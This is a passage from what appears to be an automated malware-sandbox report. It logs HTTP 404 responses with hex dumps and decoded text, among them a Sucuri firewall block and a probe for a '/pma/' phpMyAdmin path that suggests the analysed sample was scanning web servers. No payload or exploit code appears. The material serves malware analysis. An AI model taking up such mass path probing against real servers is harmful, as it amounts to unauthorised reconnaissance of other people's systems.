74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 31 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 6d 65 64 69 75 6d 2d 74 65 78 74 22 3e 54 68 69 73 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 74 72 79 69 6e 67 20 74 6f 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Fri, 22 Dec 2023 20:14:54 GMTcontent-type: text/html; charset=iso-8859-1content-length: 196server: Apachex-iplb-request-id: 668198D4:E850_D5BA2113:0050_6585EE3E_2785:656Fx-iplb-instance: 51794Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.19.9.1Date: Fri, 22 Dec 2023 20:14:55 GMTContent-Type: text/htmlContent-Length: 575Connection: keep-aliveLast-Modified: Wed, 05 Oct 2011 15:41:30 GMTETag: "23f-4ae8f0ab47e80"Data Raw: 3c 64 69 76 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 3a 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 65 72 72 6f 72 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 77 68 65 6e 20 74 68 65 72 65 20 77 61 73 20 6e 6f 20 77 65 62 20 70 61 67 65 20 77 69 74 68 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 73 70 65 63 69 66 69 65 64 20 61 74 20 74 68 65 20 77 65 62 20 73 69 74 65 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 54 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 73 75 67 67 65 73 74 69 6f 6e 73 3a 0a 20 20 20 20 20 20 20 20 3c 2f 62 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 45 6e 73 75 72 65 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 69 6e 6b 69 6e 67 20 74 6f 20 65 78 69 73 74 73 20 69 6e 20 74 68 65 20 63 6f 72 72 65 63 74 20 66 6f 6c 64 65 72 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 43 68 65 63 6b 20 79 6f 75 72 20 66 69 6c 65 20 6e 61 6d 65 20 66 6f 72 20 63 61 73 65 20 73 65 6e 73 69 74 69 76 69 74 79 20 2e 20 49 6e 64 65 78 2e 68 74 6d 20 69 73 20 6e 6f 74 20 74 68 65 20 73 61 6d 65 20 61 73 20 69 6e 64 65 78 2e 68 74 6d 21 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 64 69 73 61 62 6c 65 20 61 6e 79 20 72 65 77 72 69 74 65 20 72 75 6c 65 73 20 62 79 20 72 65 6e 61 6d 69 6e 67 20 79 6f 75 72 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 69 66 20 69 74 20 65 78 69 73 74 73 2e 0a 20 20 20 20 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a Data Ascii: <div> <p> <b>404: Page not found</b> <br/> This error is generated when there was no web page with the name you specified at the web site. </p> <p> <b> Troubleshooting suggestions: </b> </p> <p> Ensure the page you are linking to exists in the correct folder. </p> <p> Check your file name for case sensitivity . Index.htm is not the same as index.htm! </p> <p> Temporarily disable any rewrite rules by renaming your .htaccess file if it exists. </p></div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTServer: ApacheLast-Modified: Thu, 26 Jul 2007 15:09:38 GMTETag: "8d7ff8d4-2b5-4362c03e5f083"Accept-Ranges: bytesContent-Length: 693Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 22 Dec 2023 20:14:54 GMTContent-Length: 4960Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-181.ec2.internalX-Request-Id: 250869a6-7a09-4697-a2cd-cefe7b3830ceData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTServer: ApacheLast-Modified: Mon, 06 Jun 2005 08:43:43 GMTETag: "31a-3f8dbb37d6dc0;45d2231770ec0Accept-Ranges: bytesContent-Length: 794Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 2e 73 74 79 6c 65 33 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 43 43 30 30 30 30 3b 0a 7d 0a 2e 73 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 43 43 43 43 43 43 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 45 43 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 7d 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 79 6c 65 33 22 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 38 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 34 36 30 22 3e 0a 3c 74 62 6f 64 79 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 73 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>404 Not Found</title><style type="text/css"><!--.style3 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #CC0000;}.s { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; font-weight: normal; color: #000000; line-height: 1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 202Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 6d 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /pma/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Dec 2023 20:14:55 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 7c f6 f3 e7 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 14 c1 8e 3d c9 e5 62 09 db c8 b0 8e 43 30 02 2f c5 46 e0 64 12 6f d1 8c 75 ee 56 fe f1 14 d5 88 93 54 96 20 d1 e7 40 99 c9 c0 fe a5 87 b3 ce 10 0a eb bd b2 20 06 60 eb 32 64 4a 5f 94 e6 02 4f d3 d8 bd 31 8e 5d 0c da fb f1 1a 34 fc 0b d0 50 4a 31 4d 20 0a 87 82 61 4a 05 7e b6 ce 13 70 1a 5d f8 00 8e 30 64 02 1d a0 ab e6 36 1e 86 23 05 ae 75 ab 83 a9 c6 df 64 3f 6b 71 3a a4 5c 55 1f d0 7c 03 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efUAO0fg1k'&11,DL$p\|gy^w<v~SkV\|mg^K=bC0/FdouVT @ `2dJ_O1]4PJ1M aJ~p]0d6#ud?kq:\U\|Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-117.ec2.internalX-Request-Id: a1db8481-810e-4bae-b1a0-9bfde88ecbc5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-137.ec2.internalX-Request-Id: f4d99e9d-d344-433c-b089-0841d40333fbData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTServer: ApacheUpgrade: h2Connection: UpgradeLast-Modified: Mon, 06 Jun 2005 08:43:43 GMTETag: "31a-3f8dbb37d6dc0;45d2231770ec0Accept-Ranges: bytesContent-Length: 794Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 2e 73 74 79 6c 65 33 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 43 43 30 30 30 30 3b 0a 7d 0a 2e 73 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 43 43 43 43 43 43 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 45 43 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 7d 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 79 6c 65 33 22 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 38 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 34 36 30 22 3e 0a 3c 74 62 6f 64 79 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 73 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>404 Not Found</title><style type="text/css"><!--.style3 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #CC0000;}.s { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; font-weight: normal;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.19.9.1Date: Fri, 22 Dec 2023 20:14:55 GMTContent-Type: text/htmlContent-Length: 575Connection: keep-aliveLast-Modified: Wed, 05 Oct 2011 15:41:30 GMTETag: "23f-4ae8f0ab47e80"Data Raw: 3c 64 69 76 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 3a 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 65 72 72 6f 72 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 77 68 65 6e 20 74 68 65 72 65 20 77 61 73 20 6e 6f 20 77 65 62 20 70 61 67 65 20 77 69 74 68 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 73 70 65 63 69 66 69 65 64 20 61 74 20 74 68 65 20 77 65 62 20 73 69 74 65 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 54 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 73 75 67 67 65 73 74 69 6f 6e 73 3a 0a 20 20 20 20 20 20 20 20 3c 2f 62 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 45 6e 73 75 72 65 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 69 6e 6b 69 6e 67 20 74 6f 20 65 78 69 73 74 73 20 69 6e 20 74 68 65 20 63 6f 72 72 65 63 74 20 66 6f 6c 64 65 72 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 43 68 65 63 6b 20 79 6f 75 72 20 66 69 6c 65 20 6e 61 6d 65 20 66 6f 72 20 63 61 73 65 20 73 65 6e 73 69 74 69 76 69 74 79 20 2e 20 49 6e 64 65 78 2e 68 74 6d 20 69 73 20 6e 6f 74 20 74 68 65 20 73 61 6d 65 20 61 73 20 69 